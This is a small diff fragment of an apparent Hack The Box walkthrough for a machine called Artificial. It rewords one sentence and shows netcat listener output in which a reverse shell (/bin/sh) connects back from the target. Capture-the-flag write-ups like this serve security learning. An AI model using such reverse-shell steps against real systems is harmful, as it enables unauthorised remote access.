beaulieuhugo97/htb-walkthroughs/Artificial.md

 Connection: keep-alive
 ```

-I get a connection on the netcat listener:
+The payload is executed and I get a connection on the netcat listener:
 ```
 connect to [10.10.14.9] from (UNKNOWN) [10.10.11.74] 56218
 /bin/sh: 0: can't access tty; job control turned off